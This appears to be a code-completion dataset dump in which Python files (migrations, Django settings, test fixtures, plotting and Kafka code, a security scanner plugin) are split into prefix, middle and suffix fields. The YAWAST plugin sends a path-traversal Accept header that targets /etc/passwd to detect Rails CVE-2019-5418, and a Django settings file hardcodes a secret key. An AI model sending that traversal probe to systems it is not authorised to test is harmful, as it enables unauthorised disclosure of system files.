prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
"""add unique key to username Revision ID: c19852e4dcda Revises: 1478867a872a Create Date: 2020-08-06 00:39:03.004053 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = 'c19852e4dcda' down_revision = '1478867a872a' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('use
r', schema=None) as batch_op: batch_op.drop_index('ix_user_username') batch_op.create_index(batch_op.f('ix_user_username'), ['username'], unique=True) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('user', schema=None) as batch_op: batch_op.drop_index(batch_op.f('ix_user_username')) batch_op.create_index('ix_user_username', ['username'], un
ique=False) # ### end Alembic commands ###
#!/bin/env python # Copyright 2013 Zynga In
c. # # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ This module maps request to function based on the url and method """ import re import os import cgi import urlrelay from cgi import parse_qs from diskmapper import DiskMapper @urlrelay.url('^.*$', 'GET') def index(environ, start_response): """Handles GET requests """ query_string = parse_qs(environ.get("QUERY_STRING")) status = '202 Accepted' response_headers = [('Content-type', 'text/plain')] dm = DiskMapper(environ, start_response) if "action" in query_string: action = query_string["action"] if "get_host_config" in action: return dm.get_host_config() elif "get_all_config" in action: return dm.get_all_config() elif "get_vb_mapping" in action: key = None if "vbucket" in query_string: key = query_string["vbucket"][0] return dm.get_vbuckets("vbucket", key) elif "get_ss_mapping" in action: key = None if "storage_server" in query_string: key = query_string["storage_server"][0] return dm.get_vbuckets("storage_server", key) return dm.forward_request() @urlrelay.url('^.*$', 'DELETE') def delete(environ, start_response): """Handles GET requests """ dm = DiskMapper(environ, start_response) return dm.forward_request() @urlrelay.url('^.*$', 'POST') def upload(environ, start_response): dm = DiskMapper(environ, start_response) return dm.upload()
""" Django settings for mysite project. For more information on this file, see https://docs.djangoproject.com/en/1.7/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.7/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'at0zvwnp1y=4sva38l)0)ejiaiq$aqap8ehs7uld0g948yj-fy' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS =
[] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'polls', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddlewar
e', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'mysite.urls' WSGI_APPLICATION = 'mysite.wsgi.application' # Database # https://docs.djangoproject.com/en/1.7/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.7/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Tokyo' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.7/howto/static-files/ STATIC_URL = '/static/' # Template files TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
# Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from oslo_config import fixture as config_fixture from nova import config from nova import ipv6 from nova import paths from nova.tests.unit import utils CONF = cfg.CONF CONF.import_opt('use_ipv6', 'nova.netconf') CONF.import_opt('host', 'nova.netconf') CONF.import_opt('scheduler_driver', 'nova.scheduler.manager') CONF.import_opt('fake_network', 'nova.network.linux_net') CONF.import_opt('network_size', 'nova.network.manager') CONF.import_opt('num_networks', 'nova.network.manager') CONF.import_opt('floating_ip_dns_manager', 'nova.network.floating_ips') CONF.import_opt('instance_dns_manager', 'nova.network.floating_ips') CONF.import_opt('policy_file', 'nova.openstack.
common.policy') CONF.import_opt('compute_driver', 'nova.virt.driver') CONF.import_opt('api_paste_config', 'nova.wsgi') class ConfFixture(config_fixture.Config): """Fixture to manage global conf settings.""" def setUp(self): super(ConfFixture, self).setUp() self.conf.set_default('api_pas
te_config', paths.state_path_def('etc/nova/api-paste.ini')) self.conf.set_default('host', 'fake-mini') self.conf.set_default('compute_driver', 'nova.virt.fake.SmallFakeDriver') self.conf.set_default('fake_network', True) self.conf.set_default('flat_network_bridge', 'br100') self.conf.set_default('floating_ip_dns_manager', 'nova.tests.unit.utils.dns_manager') self.conf.set_default('instance_dns_manager', 'nova.tests.unit.utils.dns_manager') self.conf.set_default('network_size', 8) self.conf.set_default('num_networks', 2) self.conf.set_default('use_ipv6', True) self.conf.set_default('vlan_interface', 'eth0') self.conf.set_default('auth_strategy', 'noauth') config.parse_args([], default_config_files=[]) self.conf.set_default('connection', "sqlite://", group='database') self.conf.set_default('sqlite_synchronous', False, group='database') self.conf.set_default('fatal_exception_format_errors', True) self.conf.set_default('enabled', True, 'osapi_v3') self.conf.set_default('force_dhcp_release', False) self.conf.set_default('periodic_enable', False) self.addCleanup(utils.cleanup_dns_managers) self.addCleanup(ipv6.api.reset_backend)
ight (c) 2010-2011 Joshua Harlan Lifton. # See LICENSE.txt for details. # TODO: add tests for all machines # TODO: add tests for new status callbacks """Base classes for machine types. Do not use directly.""" import binascii import threading import serial from plover import _, log from plover.machine.keymap import Keymap from plover.misc import boolean # i18n: Machine state. STATE_STOPPED = _('stopped') # i18n: Machine state. STATE_INITIALIZING = _('initializing') # i18n: Machine state. STATE_RUNNING = _('connected') # i18n: Machine state. STATE_ERROR = _('disconnected') class StenotypeBase: """The base class for all Stenotype classes.""" # Layout of physical keys. KEYS_LAYOUT = '' # And special actions to map to. ACTIONS = () # Fallback to use as machine type for finding a compatible keymap # if one is not already available for this machine type. KEYMAP_MACHINE_TYPE = None def __init__(self): # Setup default keymap with no translation of keys. keys = self.get_keys() self.keymap = Keymap(keys, keys) self.keymap.set_mappings(zip(keys, keys)) self.stroke_subscribers = [] self.state_subscribers = [] self.state = STATE_STOPPED def set_keymap(self, keymap): """Setup machine keymap.""" self.keymap = keymap def start_capture(self): """Begin listening for output from the stenotype machine.""" pass def stop_capture(self): """Stop listening for output from the stenotype machine.""" pass def add_stroke_callback(self, callback): """Subscribe to output from the stenotype machine. Argument: callback -- The function to call whenever there is output from the stenotype machine and output is being captured. """ self.stroke_subscribers.append(callback) def remove_stroke_callback(self, callback): """Unsubscribe from output from the stenotype machine. Argument: callback -- A function that was previously subscribed. """ self.stroke_subscribers.remove(callback) def add_state_callback(self, callback): self.state_subscribers.append(callback) def remove_state_callback(self, callback): self.state_subscribers.remove(callback) def _notify(self, steno_keys): """Invoke the callback of each subscriber with the given argument.""" for callback in self.stroke_subscribers: callback(steno_keys) def set_suppression(self, enabled): '''Enable keyboard suppression. This is only of use for the keyboard machine, to suppress the keyboard when then engine is running. ''' pass def suppress_last_stroke(self, send_backspaces): '''Suppress the last stroke key events after the fact. This is only of use for the keyboard machine, and the engine is resumed with a command stroke. Argument: send_backspaces -- The function to use to send backspaces. ''' pass def _set_state(self, state): self.state = state for callback in self.state_subscribers: callback(state) def _stopped(self): self._set_state(STATE_STOPPED) def _initializing(self): self._set_state(STATE_INITIALIZING) def _ready(self): self._set_state(STATE_RUNNING) def _error(self): self._set_state(STATE_ERROR) @classmethod def get_actions(cls): """List of supported actions to map to.""" return cls.ACTIONS @classmethod def get_keys(cls): return tuple(cls.KEYS_LAYOUT.split()) @classmethod def get_option_info(cls): """Get the default options for this machine.""" return {} class ThreadedStenotypeBase(StenotypeBase, threading.Thread): """Base class for thread based machines. Subclasses should override run. """ def __init__(self): threading.Thread.__init__(self) self.name += '-machine' StenotypeBase.__init__(self) self.finished = threading.Event() def run(self): """This method should be overridden by a subclass.""" pass def start_capture(self): """Begin listening for output from the stenotype machine.""" self.finished.clear() self._initializing() self.start() def stop_capture(self): """Stop listening for output from the stenotype machine.""" self.finished.set() try: self.join() except RuntimeError: pass self._stopped() class SerialStenotypeBase(ThreadedStenotypeBase): """For use with stenotype machines that connect via serial port. This class implements the three methods necessary for a standard stenotype interface: start_capture, stop_capture, and add_callback. """ # Default seria
l parameters. SERIAL_PARAMS = { 'port': None, 'baudrate': 9600, 'bytesize': 8, 'parity': 'N', 'stopbits': 1, 'timeout': 2.0, } def __init__(self, serial_params): """Monitor the stenotype over a serial port. The key-value pairs in the <serial_params> dict are the same
as the keyword arguments for a serial.Serial object. """ ThreadedStenotypeBase.__init__(self) self.serial_port = None self.serial_params = serial_params def _close_port(self): if self.serial_port is None: return self.serial_port.close() self.serial_port = None def start_capture(self): self._close_port() try: self.serial_port = serial.Serial(**self.serial_params) except (serial.SerialException, OSError): log.warning('Can\'t open serial port', exc_info=True) self._error() return if not self.serial_port.isOpen(): log.warning('Serial port is not open: %s', self.serial_params.get('port')) self._error() return return ThreadedStenotypeBase.start_capture(self) def stop_capture(self): """Stop listening for output from the stenotype machine.""" ThreadedStenotypeBase.stop_capture(self) self._close_port() @classmethod def get_option_info(cls): """Get the default options for this machine.""" sb = lambda s: int(float(s)) if float(s).is_integer() else float(s) converters = { 'port': str, 'baudrate': int, 'bytesize': int, 'parity': str, 'stopbits': sb, 'timeout': float, 'xonxoff': boolean, 'rtscts': boolean, } return { setting: (default, converters[setting]) for setting, default in cls.SERIAL_PARAMS.items() } def _iter_packets(self, packet_size): """Yield packets of <packets_size> bytes until the machine is stopped. N.B.: to workaround the fact that the Toshiba Bluetooth stack on Windows does not correctly handle the read timeout setting (returning immediately if some data is already available): - the effective timeout is re-configured to <timeout/packet_size> - multiple reads are done (until a packet is complete) - an incomplete packet will only be discarded if one of those reads return no data (but not on short read) """ self.serial_port.timeout = max( self.serial_params.get('timeout', 1.0) / packet_size, 0.01, ) packet = b'' while not self.finished.is_set(): raw = self.serial_port.read(packet_size - len(packet)) if not raw: if packet: log.error('discarding incomplete packet: %s', binascii.hexlify(packet)) packet = b'' continue packet += raw if len(packet) != packet_size: continue yield packet pa
# -*- coding: utf-8 -*- from folium.plugins.marker_cluster import MarkerCluster from folium.utilities import if_pandas_df_convert_to_numpy, validate_location from jinja2 import Template class FastMarkerCluster(MarkerCluster): """ Add marker clusters to a map using in-browser rendering. Using FastMarkerCluster it is possible to render 000's of points far quicker than the MarkerCluster class. Be aware that the FastMarkerCluster class passes an empty list to the parent class' __init__ method during initialisation. This means that the add_child method is never called, and no reference to any marker data are retained. Methods such as get_bounds() are therefore not ava
ilable when using it. Parameters ---------- data: list of list with values List of list of shape [[lat, lon], [lat, lon], etc.] When you use a custom
callback you could add more values after the lat and lon. E.g. [[lat, lon, 'red'], [lat, lon, 'blue']] callback: string, optional A string representation of a valid Javascript function that will be passed each row in data. See the FasterMarkerCluster for an example of a custom callback. name : string, optional The name of the Layer, as it will appear in LayerControls. overlay : bool, default True Adds the layer as an optional overlay (True) or the base layer (False). control : bool, default True Whether the Layer will be included in LayerControls. show: bool, default True Whether the layer will be shown on opening (only for overlays). icon_create_function : string, default None Override the default behaviour, making possible to customize markers colors and sizes. **kwargs Additional arguments are passed to Leaflet.markercluster options. See https://github.com/Leaflet/Leaflet.markercluster """ _template = Template(u""" {% macro script(this, kwargs) %} var {{ this.get_name() }} = (function(){ {{ this.callback }} var data = {{ this.data|tojson }}; var cluster = L.markerClusterGroup({{ this.options|tojson }}); {%- if this.icon_create_function is not none %} cluster.options.iconCreateFunction = {{ this.icon_create_function.strip() }}; {%- endif %} for (var i = 0; i < data.length; i++) { var row = data[i]; var marker = callback(row); marker.addTo(cluster); } cluster.addTo({{ this._parent.get_name() }}); return cluster; })(); {% endmacro %}""") def __init__(self, data, callback=None, options=None, name=None, overlay=True, control=True, show=True, icon_create_function=None, **kwargs): if options is not None: kwargs.update(options) # options argument is legacy super(FastMarkerCluster, self).__init__(name=name, overlay=overlay, control=control, show=show, icon_create_function=icon_create_function, **kwargs) self._name = 'FastMarkerCluster' data = if_pandas_df_convert_to_numpy(data) self.data = [[*validate_location(row[:2]), *row[2:]] # noqa: E999 for row in data] if callback is None: self.callback = """ var callback = function (row) { var icon = L.AwesomeMarkers.icon(); var marker = L.marker(new L.LatLng(row[0], row[1])); marker.setIcon(icon); return marker; };""" else: self.callback = 'var callback = {};'.format(callback)
# -*- coding: utf-8 -*- """ Created on Sat Feb 01 10:45:09 2014 Training models remotely in cloud @author: pacif_000 """ from kafka.client import KafkaClient from kafka.consumer import SimpleConsumer import os import platform if platform.system() == 'Windows': import win32api else: import signal import thread import traceback kafkaHost = 'monkkafka.cloudapp.net:9092,monkkafka.cloudapp.net:9093,monkkafka.cloudapp.net:9094' kafkaTopic = 'expr' kafkaGroup = 'expr' kafka = None producer = None consumer = None def onexit(): global kafka, consumer, producer if consumer: consumer.commit() consumer.stop() consumer = None
if producer: producer.stop() producer = None if kafka: kafka.close()
kafka = None print('remote_rainter {0} is shutting down'.format(os.getpid())) def handler(sig, hook = thread.interrupt_main): global kafka, consumer, producer if consumer: consumer.commit() consumer.stop() consumer = None if producer: producer.stop() producer = None if kafka: kafka.close() kafka = None print('remote_rainter {0} is shutting down'.format(os.getpid())) exit(1) def server(): global kafka, producer, consumer if platform.system() == 'Windows': win32api.SetConsoleCtrlHandler(handler, 1) else: signal.signal(signal.SIGINT, onexit) try: kafka = KafkaClient(kafkaHost,timeout=None) consumer = SimpleConsumer(kafka, kafkaGroup, kafkaTopic, partitions=[0,1,2]) for message in consumer: print(message) except Exception as e: print('Exception {0}'.format(e)) print('Can not consume actions') print(traceback.format_exc()) except KeyboardInterrupt: onexit() finally: onexit() if __name__=='__main__': while 1: server()
# Copyright (c) 2013 - 2020 Adam Caudill and Contributors. # This file is part of YAWAST which is released under the MIT license. # See the LICENSE file or go to https://yawast.org/license/ for full license details. import re from typing import List from yawast.reporting.enums
import Vulnerabilities from yawast.scanner.plugins.result import Result from yawast.shared import network, output _checked: List[str] = [] def reset(): global _checked _checked = []
def check_cve_2019_5418(url: str) -> List[Result]: global _checked # this only applies to controllers, so skip the check unless the link ends with '/' if not url.endswith("/") or url in _checked: return [] results: List[Result] = [] _checked.append(url) try: res = network.http_get( url, False, {"Accept": "../../../../../../../../../e*c/p*sswd{{"} ) if network.response_body_is_text(res): body = res.text req = network.http_build_raw_request(res.request) # check to see if "root" is in the string, then do the proper check if "root:" in body: pattern = r"root:[a-zA-Z0-9]+:0:0:.+$" mtch = re.search(pattern, body) if mtch: results.append( Result( f"Rails CVE-2019-5418: File Content Disclosure: {url} - {mtch.group(0)}", Vulnerabilities.SERVER_RAILS_CVE_2019_5418, url, [body, req], ) ) except Exception: output.debug_exception() return results
#因为首尾相连, 考虑第一位抢或不抢 两种情况分开 class Solution: def rob(self, nums): """ :type nums: List[int] :rtype: int """ if not nums: return 0 if len(nums) == 1: return nums[0] if len(nums) == 2: return max(nums) l = [] l1 = [] # while nums[1] > nums[0] or nums[len(nums)-1] > nums[0]: # temp = nums[0] # del nums[0] # nums.append(temp)
# print(nums) # l = [0] * len(nums) l.append(nums[0]) l1.append(0) l.append(max(nums[0], nums[1])) l1.append(nums[1]) for i in range(2, len(nums)): if i == len(nums) - 1: l.append(l[i-1]) else: l.append(max(l[i-2] + nums[i], l[i-1])) if i
== 2: l1.append(max(l1[i-1], nums[i])) else: l1.append(max(l1[i-2] + nums[i], l1[i-1])) return max(max(l), max(l1))
import unittest from mock import Mock from cartodb_services.tomtom.isolines import TomTomIsolines, DEFAULT_PROFILE from cartodb_services.tools import Coordinate from credentials import tomtom_api_key VALID_ORIGIN = Coordinate(-73.989, 40.733) class TomTomIsolinesTestCase(unittest.TestCase): def setUp(self): self.tomtom_isolines = TomTomIsolines(apikey=tomtom_api_key(), logger=Mock()) def test_calculate_isochrone(self): time_ranges = [300, 900] solution = self.tomtom
_isolines.calculate_isochrone( origin=VALID_ORIGIN, profile=DEFAULT_PROFILE, time_ranges=time_ranges) assert solution def test_calculate_isodistance(self): distance_r
ange = 10000 solution = self.tomtom_isolines.calculate_isodistance( origin=VALID_ORIGIN, profile=DEFAULT_PROFILE, distance_range=distance_range) assert solution
# -*- coding: utf-8 -*- class Ledger(object): def __init__(self, db): self.db = db def balance(self, token): cursor = self.db.cursor() cursor.execute("""SELECT * FROM balances WHERE TOKEN = %s""", [
token]) row = cursor.fetchone() return 0 if row is None else row[2] def deposit(self, token, amount): cursor = self.db.cursor() cursor.execute( """INSERT INTO balances (token, amount) SELECT %s, 0 WHERE NOT EXISTS (SELECT 1 FROM balances WHERE token = %s)""", [token, token]) cursor.
execute( """UPDATE balances SET amount = amount + %s WHERE token = %s""", [amount, token]) cursor.execute( """INSERT INTO movements (token, amount) VALUES(%s, %s)""", [token, amount]) self.db.commit() return True def withdraw(self, token, amount): """Remove the given amount from the token's balance.""" cursor = self.db.cursor() cursor.execute(""" UPDATE balances SET amount = amount - %s WHERE token = %s AND amount >= %s""", [amount, token, amount]) success = (cursor.rowcount == 1) if success: cursor.execute( """INSERT INTO movements (token, amount) VALUES(%s, %s)""", [token, -amount]) self.db.commit() return success
#!/usr/bin/python # # from distutils.core import setup from spacewalk.common.rhnConfig import CFG, initCFG initCFG('web') setup(name = "rhnclient", version = "5.5.9", description = CFG.PRODUCT_NAME + " Client Utilities and Libraries", long_description = CFG.PRODUCT_NAME + """\ Client Utilities Includes: rhn_check, action handler, and modules to allow client packages to communicate with RHN.""", author = 'Joel Martin', author_email = 'jmartin@redhat.com', url = 'http://rhn.redhat.com', packages = ["rhn.actions"
, "rhn.client"], license = "GPL",
)
# Copyright (c) 2019 Ultimaker B.V. # Cura is released under the terms of the LGPLv3 or higher. from . import BedLevelMachineAction from . import UMOUpgradeSe
lection def getMetaData(): return {} def register(app): return { "machine_action": [ BedLevelMachine
Action.BedLevelMachineAction(), UMOUpgradeSelection.UMOUpgradeSelection() ]}
import _plotly_utils.basevalidators class WidthValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="width", parent_name="scatter.line", **kwargs): super(WidthValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, anim=kwargs.pop("anim", True),
edit_type=kwargs.pop("edit_
type", "style"), min=kwargs.pop("min", 0), role=kwargs.pop("role", "style"), **kwargs )
n=int(input('Enter any number: ')) if n%2!=0: n=n+1 for i in range(n): for j in range(n): if (i==int(n/2)) or j==int(n/2) or ((i==0)and (j>=int(n/2))) or ((j==0)and (i<=int(n/2))) or ((j==n-1)and (i>=int(n/2))) or ((i==n-1)and (j<=int(n/2))):
print('*',end='') else: print(' ',end=
'') print()
from PyQt4.QtCore import QSize from PyQt4.QtGui import QVBoxLayout # This is really really ugly, but the QDockWidget for some reason does not notice when # its child widget becomes smaller... # Therefore we manually set its minimum s
ize when our own minimum size changes class MyVBoxLayout(QVBoxLayout): def __init__(self, parent=None): QVBoxLayout.__init__(self, parent) self._last_size = QSize(0, 0) def setGeometry(self, r): QVBoxLayout.setGeo
metry(self, r) try: wid = self.parentWidget().parentWidget() new_size = self.minimumSize() if new_size == self._last_size: return self._last_size = new_size twid = wid.titleBarWidget() if twid is not None: theight = twid.sizeHint().height() else: theight = 0 new_size += QSize(0, theight) wid.setMinimumSize(new_size) except Exception: pass
# Copyright (c) 2013 OpenStack Foundation. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy from datetime import datetime import time from oslo_config import cfg from oslo_log import log as logging from oslo_utils import uuidutils from webob import exc from neutron.api.v2 import attributes from neutron.common import constants from neutron import context from neutron.db import agents_db from neutron.db import db_base_plugin_v2 from neutron.extensions import agent from neutron.tests.common import helpers from neutron.tests import tools from neutron.tests.unit.api.v2 import test_base from neutron.tests.unit.db import test_db_base_plugin_v2 LOG = logging.getLogger(__name__) _uuid = uuidutils.generate_uuid _get_path = test_base._get_path L3_HOSTA = 'hosta' DHCP_HOSTA = 'hosta' L3_HOSTB = 'hostb' DHCP_HOSTC = 'hostc' LBAAS_HOSTA = 'hosta' LBAAS_HOSTB = 'hostb' class AgentTestExtensionManager(object): def get_resources(self): # Add the resources to the global attribute map # This is done here as the setup process won't # initialize the main API router which extends # the global attribute map attributes.RESOURCE_ATTRIBUTE_MAP.update( agent.RESOURCE_ATTRIBUTE_MAP) return agent.Agent.get_resources() def get_actions(self): return [] def get_request_extensions(self): return [] # This plugin class is just for testing class TestAgentPlugin(db_base_plugin_v2.NeutronDbPluginV2, agents_db.AgentDbMixin): supported_extension_aliases = ["agent"] class AgentDBTestMixIn(object): def _list_agents(self, expected_res_status=None, neutron_context=None, query_string=None): agent_res = self._list('agents', neutron_context=neutron_context, query_params=query_string) if expected_res_status: self.assertEqual(agent_res.status_int, expected_res_status) return agent_res def _register_agent_states(self, lbaas_agents=False): """Register two L3 agents and two DHCP agents.""" l3_hosta = helpers._get_l3_agent_dict( L3_HOSTA, constants.L3_AGENT_MODE_LEGACY) l3_hostb = helpers._get_l3_agent_dict(
L3_HOSTB, constants.L3_AGENT_MODE_LEGACY) dhcp_hosta = helpers._get_dhcp_agent_dict(DHCP_HOSTA) dhcp_hostc = helpers._get_dhcp_agent_dict(DHCP_HOSTC) helpers.register_l3_agent(host=L3_HOSTA) helpers.register_l3_agent(host=L3_HOSTB) helpers.register_dhcp_agent(host=DHCP_HOSTA) helpers.register_dhcp_agent(host=DHCP_HOSTC) res = [l3_hosta, l3_hostb, dhcp_hosta, dhcp_hostc] if lbaas_agents: lbaas_hosta = { 'binary': 'neutron-loadbalancer-agent', 'host': LBAAS_HOSTA, 'topic': 'LOADBALANCER_AGENT', 'configurations': {'device_drivers': ['haproxy_ns']}, 'agent_type': constants.AGENT_TYPE_LOADBALANCER} lbaas_hostb = copy.deepcopy(lbaas_hosta) lbaas_hostb['host'] = LBAAS_HOSTB callback = agents_db.AgentExtRpcCallback() callback.report_state( self.adminContext, agent_state={'agent_state': lbaas_hosta}, time=datetime.utcnow().strftime(constants.ISO8601_TIME_FORMAT)) callback.report_state( self.adminContext, agent_state={'agent_state': lbaas_hostb}, time=datetime.utcnow().strftime(constants.ISO8601_TIME_FORMAT)) res += [lbaas_hosta, lbaas_hostb] return res def _register_dvr_agents(self): dvr_snat_agent = helpers.register_l3_agent( host=L3_HOSTA, agent_mode=constants.L3_AGENT_MODE_DVR_SNAT) dvr_agent = helpers.register_l3_agent( host=L3_HOSTB, agent_mode=constants.L3_AGENT_MODE_DVR) return [dvr_snat_agent, dvr_agent] class AgentDBTestCase(AgentDBTestMixIn, test_db_base_plugin_v2.NeutronDbPluginV2TestCase): fmt = 'json' def setUp(self): plugin = 'neutron.tests.unit.extensions.test_agent.TestAgentPlugin' # for these tests we need to enable overlapping ips cfg.CONF.set_default('allow_overlapping_ips', True) self.useFixture(tools.AttributeMapMemento()) ext_mgr = AgentTestExtensionManager() super(AgentDBTestCase, self).setUp(plugin=plugin, ext_mgr=ext_mgr) self.adminContext = context.get_admin_context() def test_create_agent(self): data = {'agent': {}} _req = self.new_create_request('agents', data, self.fmt) _req.environ['neutron.context'] = context.Context( '', 'tenant_id') res = _req.get_response(self.ext_api) self.assertEqual(res.status_int, exc.HTTPBadRequest.code) def test_list_agent(self): agents = self._register_agent_states() res = self._list('agents') self.assertEqual(len(agents), len(res['agents'])) def test_show_agent(self): self._register_agent_states() agents = self._list_agents( query_string='binary=neutron-l3-agent') self.assertEqual(2, len(agents['agents'])) agent = self._show('agents', agents['agents'][0]['id']) self.assertEqual('neutron-l3-agent', agent['agent']['binary']) def test_update_agent(self): self._register_agent_states() agents = self._list_agents( query_string='binary=neutron-l3-agent&host=' + L3_HOSTB) self.assertEqual(1, len(agents['agents'])) com_id = agents['agents'][0]['id'] agent = self._show('agents', com_id) new_agent = {} new_agent['agent'] = {} new_agent['agent']['admin_state_up'] = False new_agent['agent']['description'] = 'description' self._update('agents', com_id, new_agent) agent = self._show('agents', com_id) self.assertFalse(agent['agent']['admin_state_up']) self.assertEqual('description', agent['agent']['description']) def test_dead_agent(self): cfg.CONF.set_override('agent_down_time', 1) self._register_agent_states() time.sleep(1.5) agents = self._list_agents( query_string='binary=neutron-l3-agent&host=' + L3_HOSTB) self.assertFalse(agents['agents'][0]['alive'])
#!/bin/env python # \author Hans J. Johnson # # Prepare for the future by recommending # use of itk::Math:: functions over # vnl_math:: functions. # Rather than converting vnl_math_ to vnl_math:: # this prefers to convert directly to itk::Math:: # namespace. In cases where vnl_math:: is simply # an alias to std:: functions, itk::Math directly # uses the std:: version of the function. import os import sys from collections import OrderedDict ## slight modification from grep command info_for_conversion=""" XXXX,vnl_math_isnan,itk::Math::isnan XXXX,vnl_math_isinf,itk::Math::isinf XXXX,vnl_math_isfinite,itk::Math::isfinite XXXX,vnl_math_isnormal,itk::Math::isnormal XXXX,vnl_math_max,std::max XXXX,vnl_math_min,std::min XXXX,vnl_math_cuberoot,itk::Math::cbrt XXXX,vnl_math_hypot,itk::Math::hypot XXXX,vnl_math_angle_0_to_2pi,itk::Math::angle_0_to_2pi XXXX,vnl_math_angle_minuspi_to_pi,itk::Math::angle_minuspi_to_pi XXXX,vnl_math_rnd_halfinttoeven,itk::Math::halfinttoeven XXXX,vnl_math_rnd_halfintup,itk::Math::rnd_halfintup XXXX,vnl_math_rnd,itk::Math::rnd XXXX,vnl_math_floor,itk::Math::floor XXXX,vnl_math_ceil,itk::Math::ceil XXXX,vnl_math_abs,itk::Math::abs XXXX,vnl_math_sqr,itk::Math::sqr XXXX,vnl_math_cube,itk::Math::cube XXXX,vnl_math_sgn,itk::Math::sgn XXXX,vnl_math_sgn0,itk::Math::sgn0 XXXX,vnl_math_squared_magnitude,itk::Math::squared_magnitude XXXX,vnl_math_remainder_truncated,itk::Math::remainder_truncated XXXX,vnl
_math_remainder_floored,itk::Math::remainder_floored """ ITK_replace_head_names = OrderedDict() ITK_replace_functionnames = OrderedDict() ITK_replace_manual = OrderedDict() ITK_repl
ace_manual['"vnl/vnl_math.h"']='"itkMath.h"' ITK_replace_manual['<vnl/vnl_math.h>']='<itkMath.h>' for line in info_for_conversion.splitlines(): linevalues = line.split(",") if len(linevalues) != 3: #print("SKIPPING: " + str(linevalues)) continue fname=linevalues[0] new_name=fname.replace("ITK_","").replace(".h","") ITK_replace_head_names['#include "{0}"'.format(fname)]="""#if !defined( ITK_LEGACY_FUTURE_REMOVE ) # include "{0}" #endif #include <{1}>""".format(fname,new_name) ITK_replace_head_names['#include <{0}>'.format(fname)]="""#if !defined( ITK_LEGACY_FUTURE_REMOVE ) # include <{0}> #endif #include <{1}>""".format(fname,new_name) ITK_pat=linevalues[1] new_pat=linevalues[2] ITK_replace_functionnames[ITK_pat]=new_pat # Need to fix the fact that both std::ios is a base and a prefix if "std::ios::" in new_pat: ITK_replace_manual[new_pat.replace("std::ios::","std::ios_")] = new_pat #print(ITK_replace_head_names) #print(ITK_replace_functionnames) cfile=sys.argv[1] file_as_string="" with open(cfile,"r") as rfp: original_string=rfp.read() file_as_string=original_string required_header="" ## For ITK, this is always empty for searchval,replaceval in ITK_replace_head_names.items(): file_as_string_new = file_as_string.replace(searchval,required_header+replaceval) if file_as_string_new != file_as_string: required_header="" file_as_string=file_as_string_new for searchval,replaceval in ITK_replace_functionnames.items(): file_as_string = file_as_string.replace(searchval,replaceval) for searchval,replaceval in ITK_replace_manual.items(): file_as_string = file_as_string.replace(searchval,replaceval) if file_as_string != original_string: print("Processing: {0}".format(cfile)) with open(cfile,"w") as wfp: wfp.write(file_as_string) else: print("SKIPPING: {0}".format(cfile))
# Licensed under a 3-clause BSD style license - see LICENSE.rst """ Defines custom errors and exceptions used in `astropy.samp`. """ impo
rt xmlrpc.client as xmlrpc from astropy.utils.exceptions import AstropyUserWarning __all__ = ['SAMPWarning', 'SAMPHubError', 'SAMPClientError', 'SAMPProxyError'] class SAMPWa
rning(AstropyUserWarning): """ SAMP-specific Astropy warning class """ class SAMPHubError(Exception): """ SAMP Hub exception. """ class SAMPClientError(Exception): """ SAMP Client exceptions. """ class SAMPProxyError(xmlrpc.Fault): """ SAMP Proxy Hub exception """
#Author: Miguel Molero <miguel.molero@gmail.com> from PyQt5.QtCore import * from PyQt5.Qt
